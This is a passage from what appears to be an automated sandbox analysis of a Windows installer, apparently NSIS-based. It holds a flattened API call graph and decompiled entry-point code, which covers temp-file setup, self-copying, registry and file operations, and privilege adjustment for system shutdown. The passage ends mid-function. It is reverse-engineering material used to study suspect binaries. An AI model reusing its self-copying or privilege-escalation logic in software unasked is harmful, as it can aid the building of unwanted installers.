17 API calls 4154->4155 4156 40292e 4154->4156 4155->4156 4157 4026ec 4158 402d84 17 API calls 4157->4158 4159 4026fb 4158->4159 4160 402745 ReadFile 4159->4160 4161 4061db ReadFile 4159->4161 4163 402785 MultiByteToWideChar 4159->4163 4164 40283a 4159->4164 4166 4027ab SetFilePointer MultiByteToWideChar 4159->4166 4167 40284b 4159->4167 4169 402838 4159->4169 4170 406239 SetFilePointer 4159->4170 4160->4159 4160->4169 4161->4159 4163->4159 4179 4065af wsprintfW 4164->4179 4166->4159 4168 40286c SetFilePointer 4167->4168 4167->4169 4168->4169 4171 406255 4170->4171 4174 40626d 4170->4174 4172 4061db ReadFile 4171->4172 4173 406261 4172->4173 4173->4174 4175 406276 SetFilePointer 4173->4175 4176 40629e SetFilePointer 4173->4176 4174->4159 4175->4176 4177 406281 4175->4177 4176->4174 4178 40620a WriteFile 4177->4178 4178->4174 4179->4169 4180 404a6e 4181 404aa4 4180->4181 4182 404a7e 4180->4182 4184 40462b 8 API calls 4181->4184 4183 4045c4 18 API calls 4182->4183 4185 404a8b SetDlgItemTextW 4183->4185 4186 404ab0 4184->4186 4185->4181 3894 40176f 3895 402da6 17 API calls 3894->3895 3896 401776 3895->3896 3897 401796 3896->3897 3898 40179e 3896->3898 3933 406668 lstrcpynW 3897->3933 3934 406668 lstrcpynW 3898->3934 3901 40179c 3905 4068ef 5 API calls 3901->3905 3902 4017a9 3903 405f37 3 API calls 3902->3903 3904 4017af lstrcatW 3903->3904 3904->3901 3925 4017bb 3905->3925 3906 40699e 2 API calls 3906->3925 3907 406133 2 API calls 3907->3925 3909 4017cd CompareFileTime 3909->3925 3910 40188d 3912 4056ca 24 API calls 3910->3912 3911 401864 3913 4056ca 24 API calls 3911->3913 3921 401879 3911->3921 3914 401897 3912->3914 3913->3921 3915 403371 44 API calls 3914->3915 3916 4018aa 3915->3916 3917 4018be SetFileTime 3916->3917 3918 4018d0 FindCloseChangeNotification 3916->3918 3917->3918 3920 4018e1 3918->3920 3918->3921 3919 4066a5 17 API calls 3919->3925 3923 4018e6 3920->3923 3924 4018f9 3920->3924 3922 406668 lstrcpynW 3922->3925 3926 4066a5 17 API calls 3923->3926 3927 4066a5 17 API calls 3924->3927 3925->3906 3925->3907 3925->3909 3925->3910 3925->3911 3925->3919 3925->3922 3928 405cc8 MessageBoxIndirectW 3925->3928 3932 406158 GetFileAttributesW CreateFileW 3925->3932 3929 4018ee lstrcatW 3926->3929 3930 401901 3927->3930 3928->3925 3929->3930 3931 405cc8 MessageBoxIndirectW 3930->3931 3931->3921 3932->3925 3933->3901 3934->3902 4187 401a72 4188 402d84 17 API calls 4187->4188 4189 401a7b 4188->4189 4190 402d84 17 API calls 4189->4190 4191 401a20 4190->4191 4192 401573 4193 401583 ShowWindow 4192->4193 4194 40158c 4192->4194 4193->4194 4195 402c2a 4194->4195 4196 40159a ShowWindow 4194->4196 4196->4195 4197 4023f4 4198 402da6 17 API calls 4197->4198 4199 402403 4198->4199 4200 402da6 17 API calls 4199->4200 4201 40240c 4200->4201 4202 402da6 17 API calls 4201->4202 4203 402416 GetPrivateProfileStringW 4202->4203 4204 4014f5 SetForegroundWindow 4205 402c2a 4204->4205 4206 401ff6 4207 402da6 17 API calls 4206->4207 4208 401ffd 4207->4208 4209 40699e 2 API calls 4208->4209 4210 402003 4209->4210 4212 402014 4210->4212 4213 4065af wsprintfW 4210->4213 4213->4212 4214 401b77 4215 402da6 17 API calls 4214->4215 4216 401b7e 4215->4216 4217 402d84 17 API calls 4216->4217 4218 401b87 wsprintfW 4217->4218 4219 402c2a 4218->4219 4220 4046fa lstrcpynW lstrlenW 4221 40167b 4222 402da6 17 API calls 4221->4222 4223 401682 4222->4223 4224 402da6 17 API calls 4223->4224 4225 40168b 4224->4225 4226 402da6 17 API calls 4225->4226 4227 401694 MoveFileW 4226->4227 4228 4016a0 4227->4228 4229 4016a7 4227->4229 4231 401423 24 API calls 4228->4231 4230 40699e 2 API calls 4229->4230 4233 4022f6 4229->4233 4232 4016b6 4230->4232 4231->4233 4232->4233 4234 406428 36 API calls 4232->4234 4234->4228 4242 4019ff 4243 402da6 17 API calls 4242->4243 4244 401a06 4243->4244 4245 402da6 17 API calls 4244->4245 4246 401a0f 4245->4246 4247 401a16 lstrcmpiW 4246->4247 4248 401a28 lstrcmpW 4246->4248 4249 401a1c 4247->4249 4248->4249 4250 4022ff 4251 402da6 17 API calls 4250->4251 4252 402305 4251->4252 4253 402da6 17 API calls 4252->4253 4254 40230e 4253->4254 4255 402da6 17 API calls 4254->4255 4256 402317 4255->4256 4257 40699e 2 API calls 4256->4257 4258 402320 4257->4258 4259 402331 lstrlenW lstrlenW 4258->4259 4260 402324 4258->4260 4262 4056ca 24 API calls 4259->4262 4261 4056ca 24 API calls 4260->4261 4264 40232c 4260->4264 4261->4264 4263 40236f SHFileOperationW 4262->4263 4263->4260 4263->4264 4265 401000 4266 401037 BeginPaint GetClientRect 4265->4266 4267 40100c DefWindowProcW 4265->4267 4269 4010f3 4266->4269 4270 401179 4267->4270 4271 401073 CreateBrushIndirect FillRect DeleteObject 4269->4271 4272 4010fc 4269->4272 4271->4269 4273 401102 CreateFontIndirectW 4272->4273 4274 401167 EndPaint 4272->4274 4273->4274 4275 401112 6 API calls 4273->4275 4274->4270 4275->4274 4276 401d81 4277 401d94 GetDlgItem 4276->4277 4278 401d87 4276->4278 4280 401d8e 4277->4280 4279 402d84 17 API calls 4278->4279 4279->4280 4281 401dd5 GetClientRect LoadImageW SendMessageW 4280->4281 4283 402da6 17 API calls 4280->4283 4284 401e33 4281->4284 4286 401e3f 4281->4286 4283->4281 4285 401e38 DeleteObject 4284->4285 4284->4286 4285->4286 4287 401503 4288 40150b 4287->4288 4290 40151e 4287->4290 4289 402d84 17 API calls 4288->4289 4289->4290 4291 404783 4292 40479b 4291->4292 4296 4048b5 4291->4296 4297 4045c4 18 API calls 4292->4297 4293 40491f 4294 4049e9 4293->4294 4295 404929 GetDlgItem 4293->4295 4302 40462b 8 API calls 4294->4302 4298 404943 4295->4298 4299 4049aa 4295->4299 4296->4293 4296->4294 4300 4048f0 GetDlgItem SendMessageW 4296->4300 4301 404802 4297->4301 4298->4299 4307 404969 SendMessageW LoadCursorW SetCursor 4298->4307 4299->4294 4303 4049bc 4299->4303 4324 4045e6 EnableWindow 4300->4324 4305 4045c4 18 API calls 4301->4305 4306 4049e4 4302->4306 4308 4049d2 4303->4308 4309 4049c2 SendMessageW 4303->4309 4311 40480f CheckDlgButton 4305->4311 4328 404a32 4307->4328 4308->4306 4314 4049d8 SendMessageW 4308->4314 4309->4308 4310 40491a 4325 404a0e 4310->4325 4322 4045e6 EnableWindow 4311->4322 4314->4306 4317 40482d GetDlgItem 4323 4045f9 SendMessageW 4317->4323 4319 404843 SendMessageW 4320 404860 GetSysColor 4319->4320 4321 404869 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4319->4321 4320->4321 4321->4306 4322->4317 4323->4319 4324->4310 4326 404a21 SendMessageW 4325->4326 4327 404a1c 4325->4327 4326->4293 4327->4326 4331 405c8e ShellExecuteExW 4328->4331 4330 404998 LoadCursorW SetCursor 4330->4299 4331->4330 4332 402383 4333 40238a 4332->4333 4336 40239d 4332->4336 4334 4066a5 17 API calls 4333->4334 4335 402397 4334->4335 4337 405cc8 MessageBoxIndirectW 4335->4337 4337->4336 4338 402c05 SendMessageW 4339 402c2a 4338->4339 4340 402c1f InvalidateRect 4338->4340 4340->4339 4341 405809 4342 4059b3 4341->4342 4343 40582a GetDlgItem GetDlgItem GetDlgItem 4341->4343 4345 4059e4 4342->4345 4346 4059bc GetDlgItem CreateThread CloseHandle 4342->4346 4386 4045f9 SendMessageW 4343->4386 4348 405a0f 4345->4348 4349 405a34 4345->4349 4350 4059fb ShowWindow ShowWindow 4345->4350 4346->4345 4347 40589a 4352 4058a1 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4347->4352 4351 405a6f 4348->4351 4354 405a23 4348->4354 4355 405a49 ShowWindow 4348->4355 4356 40462b 8 API calls 4349->4356 4388 4045f9 SendMessageW 4350->4388 4351->4349 4361 405a7d SendMessageW 4351->4361 4359 4058f3 SendMessageW SendMessageW 4352->4359 4360 40590f 4352->4360 4362 40459d SendMessageW 4354->4362 4357 405a69 4355->4357 4358 405a5b 4355->4358 4367 405a42 4356->4367 4364 40459d SendMessageW 4357->4364 4363 4056ca 24 API calls 4358->4363 4359->4360 4365 405922 4360->4365 4366 405914 SendMessageW 4360->4366 4361->4367 4368 405a96 CreatePopupMenu 4361->4368 4362->4349 4363->4357 4364->4351 4370 4045c4 18 API calls 4365->4370 4366->4365 4369 4066a5 17 API calls 4368->4369 4371 405aa6 AppendMenuW 4369->4371 4372 405932 4370->4372 4373 405ac3 GetWindowRect 4371->4373 4374 405ad6 TrackPopupMenu 4371->4374 4375 40593b ShowWindow 4372->4375 4376 40596f GetDlgItem SendMessageW 4372->4376 4373->4374 4374->4367 4378 405af1 4374->4378 4379 405951 ShowWindow 4375->4379 4380 40595e 4375->4380 4376->4367 4377 405996 SendMessageW SendMessageW 4376->4377 4377->4367 4381 405b0d SendMessageW 4378->4381 4379->4380 4387 4045f9 SendMessageW 4380->4387 4381->4381 4382 405b2a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4381->4382 4384 405b4f SendMessageW 4382->4384 4384->4384 4385 405b78 GlobalUnlock SetClipboardData CloseClipboard 4384->4385 4385->4367 4386->4347 4387->4376 4388->4348 4389 40248a 4390 402da6 17 API calls 4389->4390 4391 40249c 4390->4391 4392 402da6 17 API calls 4391->4392 4393 4024a6 4392->4393 4406 402e36 4393->4406 4396 40292e 4397 4024de 4399 4024ea 4397->4399 4402 402d84 17 API calls 4397->4402 4398 402da6 17 API calls 4401 4024d4 lstrlenW 4398->4401 4400 402509 RegSetValueExW 4399->4400 4403 403371 44 API calls 4399->4403 4404 40251f RegCloseKey 4400->4404 4401->4397 4402->4399 4403->4400 4404->4396 4407 402e51 4406->4407 4410 406503 4407->4410 4411 406512 4410->4411 4412 4024b6 4411->4412 4413 40651d RegCreateKeyExW 4411->4413 4412->4396 4412->4397 4412->4398 4413->4412 4414 404e0b 4415 404e37 4414->4415 4416 404e1b 4414->4416 4418 404e6a 4415->4418 4419 404e3d SHGetPathFromIDListW 4415->4419 4425 405cac GetDlgItemTextW 4416->4425 4420 404e54 SendMessageW 4419->4420 4421 404e4d 4419->4421 4420->4418 4423 40140b 2 API calls 4421->4423 4422 404e28 SendMessageW 4422->4415 4423->4420 4425->4422 4426 40290b 4427 402da6 17 API calls 4426->4427 4428 402912 FindFirstFileW 4427->4428 4429 40293a 4428->4429 4433 402925 4428->4433 4434 4065af wsprintfW 4429->4434 4431 402943 4435 406668 lstrcpynW 4431->4435 4434->4431 4435->4433 4436 40190c 4437 401943 4436->4437 4438 402da6 17 API calls 4437->4438 4439 401948 4438->4439 4440 405d74 67 API calls 4439->4440 4441 401951 4440->4441 4442 40190f 4443 402da6 17 API calls 4442->4443 4444 401916 4443->4444 4445 405cc8 MessageBoxIndirectW 4444->4445 4446 40191f 4445->4446 4447 401491 4448 4056ca 24 API calls 4447->4448 4449 401498 4448->4449 4450 402891 4451 402898 4450->4451 4452 402ba9 4450->4452 4453 402d84 17 API calls 4451->4453 4454 40289f 4453->4454 4455 4028ae SetFilePointer 4454->4455 4455->4452 4456 4028be 4455->4456 4458 4065af wsprintfW 4456->4458 4458->4452 4459 401f12 4460 402da6 17 API calls 4459->4460 4461 401f18 4460->4461 4462 402da6 17 API calls 4461->4462 4463 401f21 4462->4463 4464 402da6 17 API calls 4463->4464 4465 401f2a 4464->4465 4466 402da6 17 API calls 4465->4466 4467 401f33 4466->4467 4468 401423 24 API calls 4467->4468 4469 401f3a 4468->4469 4476 405c8e ShellExecuteExW 4469->4476 4471 401f82 4472 406ae0 5 API calls 4471->4472 4474 40292e 4471->4474 4473 401f9f CloseHandle 4472->4473 4473->4474 4476->4471 4477 402f93 4478 402fa5 SetTimer 4477->4478 4479 402fbe 4477->4479 4478->4479 4480 40300c 4479->4480 4481 403012 MulDiv 4479->4481 4482 402fcc wsprintfW SetWindowTextW SetDlgItemTextW 4481->4482 4482->4480 4498 401d17 4499 402d84 17 API calls 4498->4499 4500 401d1d IsWindow 4499->4500 4501 401a20 4500->4501 4502 401b9b 4503 401ba8 4502->4503 4504 401bec 4502->4504 4511 401bbf 4503->4511 4513 401c31 4503->4513 4505 401bf1 4504->4505 4506 401c16 GlobalAlloc 4504->4506 4510 40239d 4505->4510 4523 406668 lstrcpynW 4505->4523 4508 4066a5 17 API calls 4506->4508 4507 4066a5 17 API calls 4509 402397 4507->4509 4508->4513 4517 405cc8 MessageBoxIndirectW 4509->4517 4521 406668 lstrcpynW 4511->4521 4513->4507 4513->4510 4515 401c03 GlobalFree 4515->4510 4516 401bce 4522 406668 lstrcpynW 4516->4522 4517->4510 4519 401bdd 4524 406668 lstrcpynW 4519->4524 4521->4516 4522->4519 4523->4515 4524->4510 4525 40261c 4526 402da6 17 API calls 4525->4526 4527 402623 4526->4527 4530 406158 GetFileAttributesW CreateFileW 4527->4530 4529 40262f 4530->4529 4538 40149e 4539 4014ac PostQuitMessage 4538->4539 4540 40239d 4538->4540 4539->4540 4541 40259e 4551 402de6 4541->4551 4544 402d84 17 API calls 4545 4025b1 4544->4545 4546 4025d9 RegEnumValueW 4545->4546 4547 4025cd RegEnumKeyW 4545->4547 4549 40292e 4545->4549 4548 4025ee RegCloseKey 4546->4548 4547->4548 4548->4549 4552 402da6 17 API calls 4551->4552 4553 402dfd 4552->4553 4554 4064d5 RegOpenKeyExW 4553->4554 4555 4025a8 4554->4555 4555->4544 4556 4015a3 4557 402da6 17 API calls 4556->4557 4558 4015aa SetFileAttributesW 4557->4558 4559 4015bc 4558->4559 3755 401fa4 3756 402da6 17 API calls 3755->3756 3757 401faa 3756->3757 3758 4056ca 24 API calls 3757->3758 3759 401fb4 3758->3759 3760 405c4b 2 API calls 3759->3760 3761 401fba 3760->3761 3762 401fdd CloseHandle 3761->3762 3766 40292e 3761->3766 3770 406ae0 WaitForSingleObject 3761->3770 3762->3766 3765 401fcf 3767 401fd4 3765->3767 3768 401fdf 3765->3768 3775 4065af wsprintfW 3767->3775 3768->3762 3771 406afa 3770->3771 3772 406b0c GetExitCodeProcess 3771->3772 3773 406a71 2 API calls 3771->3773 3772->3765 3774 406b01 WaitForSingleObject 3773->3774 3774->3771 3775->3762 3875 403c25 3876 403c40 3875->3876 3877 403c36 CloseHandle 3875->3877 3878 403c54 3876->3878 3879 403c4a CloseHandle 3876->3879 3877->3876 3884 403c82 3878->3884 3879->3878 3882 405d74 67 API calls 3883 403c65 3882->3883 3885 403c90 3884->3885 3886 403c59 3885->3886 3887 403c95 FreeLibrary GlobalFree 3885->3887 3886->3882 3887->3886 3887->3887 4560 40202a 4561 402da6 17 API calls 4560->4561 4562 402031 4561->4562 4563 406a35 5 API calls 4562->4563 4564 402040 4563->4564 4565 40205c GlobalAlloc 4564->4565 4566 4020cc 4564->4566 4565->4566 4567 402070 4565->4567 4568 406a35 5 API calls 4567->4568 4569 402077 4568->4569 4570 406a35 5 API calls 4569->4570 4571 402081 4570->4571 4571->4566 4575 4065af wsprintfW 4571->4575 4573 4020ba 4576 4065af wsprintfW 4573->4576 4575->4573 4576->4566 4577 40252a 4578 402de6 17 API calls 4577->4578 4579 402534 4578->4579 4580 402da6 17 API calls 4579->4580 4581 40253d 4580->4581 4582 402548 RegQueryValueExW 4581->4582 4585 40292e 4581->4585 4583 40256e RegCloseKey 4582->4583 4584 402568 4582->4584 4583->4585 4584->4583 4588 4065af wsprintfW 4584->4588 4588->4583 4589 4021aa 4590 402da6 17 API calls 4589->4590 4591 4021b1 4590->4591 4592 402da6 17 API calls 4591->4592 4593 4021bb 4592->4593 4594 402da6 17 API calls 4593->4594 4595 4021c5 4594->4595 4596 402da6 17 API calls 4595->4596 4597 4021cf 4596->4597 4598 402da6 17 API calls 4597->4598 4599 4021d9 4598->4599 4600 402218 CoCreateInstance 4599->4600 4601 402da6 17 API calls 4599->4601 4604 402237 4600->4604 4601->4600 4602 401423 24 API calls 4603 4022f6 4602->4603 4604->4602 4604->4603 4612 401a30 4613 402da6 17 API calls 4612->4613 4614 401a39 ExpandEnvironmentStringsW 4613->4614 4615 401a60 4614->4615 4616 401a4d 4614->4616 4616->4615 4617 401a52 lstrcmpW 4616->4617 4617->4615 4618 405031 GetDlgItem GetDlgItem 4619 405083 7 API calls 4618->4619 4620 4052a8 4618->4620 4621 40512a DeleteObject 4619->4621 4622 40511d SendMessageW 4619->4622 4625 40538a 4620->4625 4652 405317 4620->4652 4672 404f7f SendMessageW 4620->4672 4623 405133 4621->4623 4622->4621 4624 40516a 4623->4624 4628 4066a5 17 API calls 4623->4628 4626 4045c4 18 API calls 4624->4626 4627 405436 4625->4627 4631 40529b 4625->4631 4637 4053e3 SendMessageW 4625->4637 4630 40517e 4626->4630 4632 405440 SendMessageW 4627->4632 4633 405448 4627->4633 4629 40514c SendMessageW SendMessageW 4628->4629 4629->4623 4636 4045c4 18 API calls 4630->4636 4634 40462b 8 API calls 4631->4634 4632->4633 4640 405461 4633->4640 4641 40545a ImageList_Destroy 4633->4641 4648 405471 4633->4648 4639 405637 4634->4639 4653 40518f 4636->4653 4637->4631 4643 4053f8 SendMessageW 4637->4643 4638 40537c SendMessageW 4638->4625 4644 40546a GlobalFree 4640->4644 4640->4648 4641->4640 4642 4055eb 4642->4631 4649 4055fd ShowWindow GetDlgItem ShowWindow 4642->4649 4646 40540b 4643->4646 4644->4648 4645 40526a GetWindowLongW SetWindowLongW 4647 405283 4645->4647 4657 40541c SendMessageW 4646->4657 4650 4052a0 4647->4650 4651 405288 ShowWindow 4647->4651 4648->4642 4665 4054ac 4648->4665 4677 404fff 4648->4677 4649->4631 4671 4045f9 SendMessageW 4650->4671 4670 4045f9 SendMessageW 4651->4670 4652->4625 4652->4638 4653->4645 4656 4051e2 SendMessageW 4653->4656 4658 405265 4653->4658 4659 405220 SendMessageW 4653->4659 4660 405234 SendMessageW 4653->4660 4656->4653 4657->4627 4658->4645 4658->4647 4659->4653 4660->4653 4662 4055b6 4663 4055c1 InvalidateRect 4662->4663 4666 4055cd 4662->4666 4663->4666 4664 4054da SendMessageW 4668 4054f0 4664->4668 4665->4664 4665->4668 4666->4642 4686 404f3a 4666->4686 4667 405564 SendMessageW SendMessageW 4667->4668 4668->4662 4668->4667 4670->4631 4671->4620 4673 404fa2 GetMessagePos ScreenToClient SendMessageW 4672->4673 4674 404fde SendMessageW 4672->4674 4675 404fd6 4673->4675 4676 404fdb 4673->4676 4674->4675 4675->4652 4676->4674 4689 406668 lstrcpynW 4677->4689 4679 405012 4690 4065af wsprintfW 4679->4690 4681 40501c 4682 40140b 2 API calls 4681->4682 4683 405025 4682->4683 4691 406668 lstrcpynW 4683->4691 4685 40502c 4685->4665 4692 404e71 4686->4692 4688 404f4f 4688->4642 4689->4679 4690->4681 4691->4685 4693 404e8a 4692->4693 4694 4066a5 17 API calls 4693->4694 4695 404eee 4694->4695 4696 4066a5 17 API calls 4695->4696 4697 404ef9 4696->4697 4698 4066a5 17 API calls 4697->4698 4699 404f0f lstrlenW wsprintfW SetDlgItemTextW 4698->4699 4699->4688 4705 4023b2 4706 4023ba 4705->4706 4709 4023c0 4705->4709 4707 402da6 17 API calls 4706->4707 4707->4709 4708 4023ce 4711 4023dc 4708->4711 4712 402da6 17 API calls 4708->4712 4709->4708 4710 402da6 17 API calls 4709->4710 4710->4708 4713 402da6 17 API calls 4711->4713 4712->4711 4714 4023e5 WritePrivateProfileStringW 4713->4714 4715 404734 lstrlenW 4716 404753 4715->4716 4717 404755 WideCharToMultiByte 4715->4717 4716->4717 4718 402434 4719 402467 4718->4719 4720 40243c 4718->4720 4722 402da6 17 API calls 4719->4722 4721 402de6 17 API calls 4720->4721 4723 402443 4721->4723 4724 40246e 4722->4724 4726 402da6 17 API calls 4723->4726 4728 40247b 4723->4728 4729 402e64 4724->4729 4727 402454 RegDeleteValueW RegCloseKey 4726->4727 4727->4728 4730 402e78 4729->4730 4732 402e71 4729->4732 4730->4732 4733 402ea9 4730->4733 4732->4728 4734 4064d5 RegOpenKeyExW 4733->4734 4735 402ed7 4734->4735 4736 402ee7 RegEnumValueW 4735->4736 4743 402f81 4735->4743 4745 402f0a 4735->4745 4737 402f71 RegCloseKey 4736->4737 4736->4745 4737->4743 4738 402f46 RegEnumKeyW 4739 402f4f RegCloseKey 4738->4739 4738->4745 4740 406a35 5 API calls 4739->4740 4741 402f5f 4740->4741 4741->4743 4744 402f63 RegDeleteKeyW 4741->4744 4742 402ea9 6 API calls 4742->4745 4743->4732 4744->4743 4745->4737 4745->4738 4745->4739 4745->4742 4746 401735 4747 402da6 17 API calls 4746->4747 4748 40173c SearchPathW 4747->4748 4749 401757 4748->4749 4750 404ab5 4751 404ae1 4750->4751 4752 404af2 4750->4752 4811 405cac GetDlgItemTextW 4751->4811 4754 404afe GetDlgItem 4752->4754 4759 404b5d 4752->4759 4757 404b12 4754->4757 4755 404c41 4760 404df0 4755->4760 4813 405cac GetDlgItemTextW 4755->4813 4756 404aec 4758 4068ef 5 API calls 4756->4758 4762 404b26 SetWindowTextW 4757->4762 4763 405fe2 4 API calls 4757->4763 4758->4752 4759->4755 4759->4760 4764 4066a5 17 API calls 4759->4764 4767 40462b 8 API calls 4760->4767 4766 4045c4 18 API calls 4762->4766 4768 404b1c 4763->4768 4769 404bd1 SHBrowseForFolderW 4764->4769 4765 404c71 4770 40603f 18 API calls 4765->4770 4771 404b42 4766->4771 4772 404e04 4767->4772 4768->4762 4776 405f37 3 API calls 4768->4776 4769->4755 4773 404be9 CoTaskMemFree 4769->4773 4774 404c77 4770->4774 4775 4045c4 18 API calls 4771->4775 4777 405f37 3 API calls 4773->4777 4814 406668 lstrcpynW 4774->4814 4778 404b50 4775->4778 4776->4762 4779 404bf6 4777->4779 4812 4045f9 SendMessageW 4778->4812 4782 404c2d SetDlgItemTextW 4779->4782 4787 4066a5 17 API calls 4779->4787 4782->4755 4783 404b56 4785 406a35 5 API calls 4783->4785 4784 404c8e 4786 406a35 5 API calls 4784->4786 4785->4759 4793 404c95 4786->4793 4788 404c15 lstrcmpiW 4787->4788 4788->4782 4791 404c26 lstrcatW 4788->4791 4789 404cd6 4815 406668 lstrcpynW 4789->4815 4791->4782 4792 404cdd 4794 405fe2 4 API calls 4792->4794 4793->4789 4797 405f83 2 API calls 4793->4797 4799 404d2e 4793->4799 4795 404ce3 GetDiskFreeSpaceW 4794->4795 4798 404d07 MulDiv 4795->4798 4795->4799 4797->4793 4798->4799 4801 404f3a 20 API calls 4799->4801 4809 404d9f 4799->4809 4800 404dc2 4816 4045e6 EnableWindow 4800->4816 4803 404d8c 4801->4803 4802 40140b 2 API calls 4802->4800 4805 404da1 SetDlgItemTextW 4803->4805 4806 404d91 4803->4806 4805->4809 4807 404e71 20 API calls 4806->4807 4807->4809 4808 404dde 4808->4760 4810 404a0e SendMessageW 4808->4810 4809->4800 4809->4802 4810->4760 4811->4756 4812->4783 4813->4765 4814->4784 4815->4792 4816->4808 4817 401d38 4818 402d84 17 API calls 4817->4818 4819 401d3f 4818->4819 4820 402d84 17 API calls 4819->4820 4821 401d4b GetDlgItem 4820->4821 4822 402638 4821->4822 4823 4014b8 4824 4014be 4823->4824 4825 401389 2 API calls 4824->4825 4826 4014c6 4825->4826 4827 40563e 4828 405662 4827->4828 4829 40564e 4827->4829 4832 40566a IsWindowVisible 4828->4832 4838 405681 4828->4838 4830 405654 4829->4830 4831 4056ab 4829->4831 4834 404610 SendMessageW 4830->4834 4833 4056b0 CallWindowProcW 4831->4833 4832->4831 4835 405677 4832->4835 4836 40565e 4833->4836 4834->4836 4837 404f7f 5 API calls 4835->4837 4837->4838 4838->4833 4839 404fff 4 API calls 4838->4839 4839->4831 4840 40263e 4841 402652 4840->4841 4842 40266d 4840->4842 4843 402d84 17 API calls 4841->4843 4844 402672 4842->4844 4845 40269d 4842->4845 4854 402659 4843->4854 4847 402da6 17 API calls 4844->4847 4846 402da6 17 API calls 4845->4846 4849 4026a4 lstrlenW 4846->4849 4848 402679 4847->4848 4857 40668a WideCharToMultiByte 4848->4857 4849->4854 4851 40268d lstrlenA 4851->4854 4852 4026e7 4853 4026d1 4853->4852 4855 40620a WriteFile 4853->4855 4854->4852 4854->4853 4856 406239 5 API calls 4854->4856 4855->4852 4856->4853 4857->4851

                                                              Executed Functions

                                                              Function 00403640 Relevance: 91.4, APIs: 34, Strings: 18, Instructions: 450stringfilecomCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 403640-403690 SetErrorMode GetVersionExW 1 403692-4036c6 GetVersionExW 0->1 2 4036ca-4036d1 0->2 1->2 3 4036d3 2->3 4 4036db-40371b 2->4 3->4 5 40371d-403725 call 406a35 4->5 6 40372e 4->6 5->6 11 403727 5->11 8 403733-403747 call 4069c5 lstrlenA 6->8 13 403749-403765 call 406a35 * 3 8->13 11->6 20 403776-4037d8 #17 OleInitialize SHGetFileInfoW call 406668 GetCommandLineW call 406668 13->20 21 403767-40376d 13->21 28 4037e1-4037f4 call 405f64 CharNextW 20->28 29 4037da-4037dc 20->29 21->20 25 40376f 21->25 25->20 32 4038eb-4038f1 28->32 29->28 33 4038f7 32->33 34 4037f9-4037ff 32->34 37 40390b-403925 GetTempPathW call 40360f 33->37 35 403801-403806 34->35 36 403808-40380e 34->36 35->35 35->36 38 403810-403814 36->38 39 403815-403819 36->39 47 403927-403945 GetWindowsDirectoryW lstrcatW call 40360f 37->47 48 40397d-403995 DeleteFileW call 4030d0 37->48 38->39 41 4038d9-4038e7 call 405f64 39->41 42 40381f-403825 39->42 41->32 58 4038e9-4038ea 41->58 45 403827-40382e 42->45 46 40383f-403878 42->46 51 403830-403833 45->51 52 403835 45->52 53 403894-4038ce 46->53 54 40387a-40387f 46->54 47->48 62 403947-403977 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40360f 47->62 64 40399b-4039a1 48->64 65 403b6c-403b7a ExitProcess OleUninitialize 48->65 51->46 51->52 52->46 56 4038d0-4038d4 53->56 57 4038d6-4038d8 53->57 54->53 60 403881-403889 54->60 56->57 63 4038f9-403906 call 406668 56->63 57->41 58->32 66 403890 60->66 67 40388b-40388e 60->67 62->48 62->65 63->37 69 4039a7-4039ba call 405f64 64->69 70 403a48-403a4f call 403d17 64->70 72 403b91-403b97 65->72 73 403b7c-403b8b call 405cc8 ExitProcess 65->73 66->53 67->53 67->66 88 403a0c-403a19 69->88 89 4039bc-4039f1 69->89 83 403a54-403a57 70->83 74 403b99-403bae GetCurrentProcess OpenProcessToken 72->74 75 403c0f-403c17 72->75 80 403bb0-403bd9 LookupPrivilegeValueW AdjustTokenPrivileges 74->80 81 403bdf-403bed call 406a35 74->81 84 403c19 75->84 85 403c1c-403c1f ExitProcess 75->85 80->81 95 403bfb-403c06 ExitWindowsEx 81->95 96 403bef-403bf9 81->96 83->65 84->85 90 403a1b-403a29 call 40603f 88->90 91 403a5c-403a70 call 405c33 lstrcatW 88->91 93 4039f3-4039f7 89->93 90->65 104 403a2f-403a45 call 406668 * 2 90->104 107 403a72-403a78 lstrcatW 91->107 108 403a7d-403a97 lstrcatW lstrcmpiW 91->108 98 403a00-403a08 93->98 99 4039f9-4039fe 93->99 95->75 101 403c08-403c0a call 40140b 95->101 96->95 96->101 98->93 103 403a0a 98->103 99->98 99->103 101->75 103->88 104->70 107->108 109 403b6a 108->109 110 403a9d-403aa0 108->110 109->65 112 403aa2-403aa7 call 405b99 110->112 113 403aa9 call 405c16 110->113 119 403aae-403abe SetCurrentDirectoryW 112->119 113->119 121 403ac0-403ac6 call 406668 119->121 122 403acb-403af7 call 406668 119->122 121->122 126 403afc-403b17 call 4066a5 DeleteFileW 122->126 129 403b57-403b61 126->129 130 403b19-403b29 CopyFileW 126->130 129->126 132 403b63-403b65 call 406428 129->132 130->129 131 403b2b-403b4b call 406428 call 4066a5 call 405c4b 130->131 131->129 140 403b4d-403b54 CloseHandle 131->140 132->109 140->129
                                                              C-Code - Quality: 78%
                                                              			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				WCHAR* _t92;
				char* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t119;
				intOrPtr* _t123;
				void* _t137;
				void* _t143;
				void* _t148;
				void* _t152;
				void* _t157;
				signed int _t167;
				void* _t170;
				void* _t175;
				intOrPtr _t177;
				intOrPtr _t178;
				intOrPtr* _t179;
				int _t188;
				void* _t189;
				void* _t198;
				signed int _t204;
				signed int _t209;
				signed int _t214;
				signed int _t216;
				int* _t218;
				signed int _t226;
				signed int _t229;
				CHAR* _t231;
				char* _t232;
				signed int _t233;
				WCHAR* _t234;
				void* _t250;

				_t216 = 0x20;
				_t188 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
